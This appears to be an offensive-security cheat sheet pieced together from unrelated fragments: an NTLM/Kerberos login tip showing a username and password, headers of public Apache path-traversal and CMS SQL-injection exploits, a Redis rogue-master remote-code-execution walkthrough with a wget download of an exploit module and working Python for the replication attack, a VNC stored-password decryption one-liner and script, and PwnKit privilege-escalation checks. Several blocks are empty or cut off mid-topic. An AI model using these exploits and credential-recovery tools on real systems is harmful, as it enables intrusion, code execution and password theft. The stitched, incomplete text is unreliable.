Error:
10.129.232.168\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
Solution 1: Add the -k flag to authenticate through Kerberos instead of NTLM. STATUS_NOT_SUPPORTED on a credential you believe is valid usually means the host rejects NTLM (NTLM disabled by policy), not that the password is wrong. With -k, address the host by its DNS name rather than its IP (the service ticket is bound to the name, so add the FQDN to /etc/hosts or point DNS at the DC) and keep your clock within the domain's allowed skew (5 minutes by default), otherwise the Kerberos request fails instead.
```python
#!/usr/bin/python3
# Author: Ravin | Blacknote
# Link: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution/blob/main/exploit.py
# CVE-2021-41773 | CVE-2021-42013
# Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution
# Usage:
# In some cases reading files or RCE might fail, so try both of them:
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 rce 'id'
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 file '/etc/passwd'
```
```python
#!/usr/bin/env python3
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Original-Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group (https://gist.github.com/pdelteil/6ebac2290a6fb33eea1af194485a22b1)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
# Usage: python3 cmsms_2.2.9_sqli.py -u http://$IP/simple/ -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt -c
```
First, fetch the module:
```bash
wget -O exp.so https://github.com/strikoder/OffensiveSecurity/raw/refs/heads/main/CVES/exp.so
```
Then save the Python below as `payload.py` (source: https://github.com/Ridter/redis-rce/blob/master/redis-rce.py) and run it. `--lport` is the port your box listens on as the rogue Redis master, so if 80 does not work try another port the victim can reach out to:
```bash
python3 payload.py --rhost 192.168.209.176 --lhost 192.168.45.238 --lport 80 --rport 6379 --file exp.so
```
```python
#!/usr/bin/env python
```
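What redis-rce.py does with those arguments is a replication trick: the victim is told to become a replica of the attacker, the attacker's "master" hands it the `.so` where the RDB snapshot belongs, and the victim writes it to `dir/dbfilename`, which was pointed at the module path first. The block below is an added example written for this page, not redis-rce.py or the module from the linked repository: a minimal rogue master, a fake replica that plays the victim's side locally so the exchange can be seen end to end, and the command sequence the attacker sends. It assumes the module registers a `system.exec` command (as the module redis-rce.py expects does) and uses `/tmp` as the drop directory; both are assumptions, and the payload bytes in the demo are constructed.

```python
#!/usr/bin/env python3
"""Added example, not redis-rce.py: the replication handshake behind the
module-load technique, using only the standard library."""
import socket
import threading


def resp_command(*args):
    """Encode a command as a RESP array of bulk strings (the form clients send)."""
    parts = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def parse_resp_array(data):
    """Decode one RESP array into its bulk strings; bare inline commands also pass."""
    if not data.startswith(b"*"):
        return data.strip().split()
    lines = data.split(b"\r\n")
    count, args, i = int(lines[0][1:]), [], 1
    for _ in range(count):
        if not lines[i].startswith(b"$"):
            raise ValueError("expected a bulk string")
        args.append(lines[i + 1])
        i += 2
    return args


def rogue_master_reply(args, payload):
    """Answer the victim's handshake. On PSYNC, claim a full resync and ship
    `payload` as the 'RDB' bulk string; the victim writes it to dir/dbfilename."""
    cmd = args[0].upper() if args else b""
    if cmd == b"PING":
        return b"+PONG\r\n"
    if cmd == b"REPLCONF":
        return b"+OK\r\n"
    if cmd in (b"PSYNC", b"SYNC"):
        return (b"+FULLRESYNC " + b"Z" * 40 + b" 1\r\n"
                + b"$%d\r\n" % len(payload) + payload)
    return b"-ERR not implemented by rogue master\r\n"


def start_rogue_master(lhost, lport, payload):
    """Bind, serve one replica on a background thread, return the bound port.
    One command per recv() is assumed, which holds for the handshake."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((lhost, lport))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(65536)
                if not data:
                    break
                args = parse_resp_array(data)
                conn.sendall(rogue_master_reply(args, payload))
                if args and args[0].upper() in (b"PSYNC", b"SYNC"):
                    break
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def fake_replica_handshake(host, port):
    """Play the victim locally: PING, REPLCONF, PSYNC, then read the bulk 'RDB'.
    Returns the bytes a real victim would write to disk."""
    with socket.create_connection((host, port), timeout=5) as s:
        for cmd, expected in ((("PING",), b"+PONG\r\n"),
                              (("REPLCONF", "listening-port", 6379), b"+OK\r\n")):
            s.sendall(resp_command(*cmd))
            if s.recv(64) != expected:
                raise ConnectionError(f"unexpected reply to {cmd[0]}")
        s.sendall(resp_command("PSYNC", "?", -1))
        data = b""
        while True:
            chunk = s.recv(65536)
            if not chunk:
                raise ConnectionError("master closed before sending the payload")
            data += chunk
            _, sep, rest = data.partition(b"\r\n$")
            length, sep2, body = rest.partition(b"\r\n")
            if sep and sep2 and length.isdigit() and len(body) >= int(length):
                return body[: int(length)]


def attacker_commands(lhost, lport, so_name="exp.so", cmd="id"):
    """Commands sent to the victim around the handshake (system.exec and /tmp assumed)."""
    return [
        resp_command("CONFIG", "SET", "dir", "/tmp"),
        resp_command("CONFIG", "SET", "dbfilename", so_name),
        resp_command("SLAVEOF", lhost, lport),
        # wait for the victim to pull the .so from the rogue master, then:
        resp_command("MODULE", "LOAD", f"/tmp/{so_name}"),
        resp_command("SLAVEOF", "NO", "ONE"),
        resp_command("system.exec", cmd),
    ]


if __name__ == "__main__":
    constructed_so = b"\x7fELF-constructed-stand-in-not-a-real-module"
    port = start_rogue_master("127.0.0.1", 0, constructed_so)
    got = fake_replica_handshake("127.0.0.1", port)
    print("replica received", len(got), "bytes; matches:", got == constructed_so)
```

Running the block shows the handshake on loopback. The same `start_rogue_master` bound to your `--lhost`/`--lport` with the real `exp.so` bytes is the listening half of the attack; `attacker_commands` is what goes to `--rhost:--rport` through a normal Redis client. Clean up afterwards by restoring `dbfilename` to `dump.rdb`, or the next BGSAVE overwrites your module.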
################################################################################
# Mimikatz — Quick Commands & Explanations (lab: `pentest.local`)
# Video link: https://youtu.be/XPxqZFaC0xE
# Lab assumptions: domain `pentest.local`, DC `LAB-DC`, hosts `LAB-FINANCE`, `LAB-MEDIA`.
# Run Mimikatz as Administrator / SYSTEM and use the x64 build on x64 hosts.
################################################################################
## BASICS — setup & checks
# show mimikatz version (verify x64 build)
mimikatz # version
# check HTB [Cascade](https://www.hackthebox.com/machines/cascade) for more info
# Step 1: get the stored VNC password blob, e.g. from a .reg export line such as "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
# Step 2: remove the commas => 6bcf2a4b6e5aca0f
# Step 3: decrypt it with this one-liner; the key is the hard-coded DES key VNC servers (TightVNC, RealVNC, UltraVNC) use for stored passwords, with a zero IV and no padding
```bash
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```
# Replace 6bcf2a4b6e5aca0f with your value; the plaintext is in hexdump's right-hand column. On OpenSSL 3 single DES lives in the legacy provider, so if enc reports an unsupported cipher add `-provider legacy -provider default` to the command.
## [More info](https://github.com/frizb/PasswordDecrypts) on VNC
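The same decryption as a reusable script, added here as an example that is not from the page or the linked repository: it takes the registry value in any of its usual spellings, drives `openssl` the way the one-liner does, and retries with the legacy provider when an OpenSSL 3 build refuses single DES. It assumes `openssl` is on PATH; the sample value in the usage line is the Cascade one from the steps above.

```python
#!/usr/bin/env python3
"""Added example: decrypt a stored VNC password by driving openssl, handling the
registry export format and OpenSSL 3's legacy-provider requirement for DES."""
import re
import subprocess

# Hard-coded key shared by VNC stored-password storage, same as in the one-liner.
VNC_DES_KEY = "e84ad660c4721ae0"


def normalize_registry_hex(value):
    """Accept '6b,cf,2a,...' (regedit export), '6B CF 2A', '6b-cf-2a' or bare hex
    and return lowercase hex. Pass only the value, not the whole .reg line."""
    return re.sub(r"[\s,:-]", "", value).lower()


def _openssl_des_decrypt(ciphertext, legacy):
    cmd = ["openssl", "enc", "-des-cbc", "-d", "-nopad", "-nosalt",
           "-K", VNC_DES_KEY, "-iv", "0000000000000000"]
    if legacy:
        # OpenSSL 3 moved single DES to the legacy provider; the default provider
        # has to stay loaded too or enc loses everything else it needs.
        cmd += ["-provider", "legacy", "-provider", "default"]
    result = subprocess.run(cmd, input=ciphertext, capture_output=True)
    if result.returncode != 0:
        raise RuntimeError(result.stderr.decode(errors="replace").strip())
    return result.stdout


def vnc_decrypt(registry_value):
    """Return the plaintext password with NUL padding stripped."""
    hexval = normalize_registry_hex(registry_value)
    if len(hexval) % 16 != 0:
        raise ValueError("VNC password blobs are whole 8-byte DES blocks")
    ciphertext = bytes.fromhex(hexval)   # raises ValueError on non-hex junk
    try:
        plain = _openssl_des_decrypt(ciphertext, legacy=False)
    except RuntimeError:
        plain = _openssl_des_decrypt(ciphertext, legacy=True)
    return plain.rstrip(b"\x00").decode("latin-1")


if __name__ == "__main__":
    import sys
    print(vnc_decrypt(sys.argv[1] if len(sys.argv) > 1 else "6b,cf,2a,4b,6e,5a,ca,0f"))
```

Quote the argument when it contains commas or spaces. Because DES-CBC with a zero IV on one block is plain ECB, this works for the 8-byte blobs TightVNC writes and still decrypts longer multi-block values correctly.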
Local privilege escalation exploit for the polkit pkexec vulnerability (CVE-2021-4034, "PwnKit"). Grants a root shell on vulnerable Linux systems. Quick checks before trying it:
/usr/bin/pkexec --version   # 0.120 or lower is vulnerable upstream; distros patched without bumping the version (Ubuntu's 0.105 for example), so an old number alone is not proof
uname -r                    # kernel version is informational only (5.3.0-42 and 5.4.0-107 seen in labs); the bug is in pkexec, not the kernel
cat /etc/issue              # distro and release, to look up whether the polkit package has been patched
ls -la /usr/bin/pkexec      # must be setuid root (-rwsr-xr-x); without the SUID bit there is nothing to escalate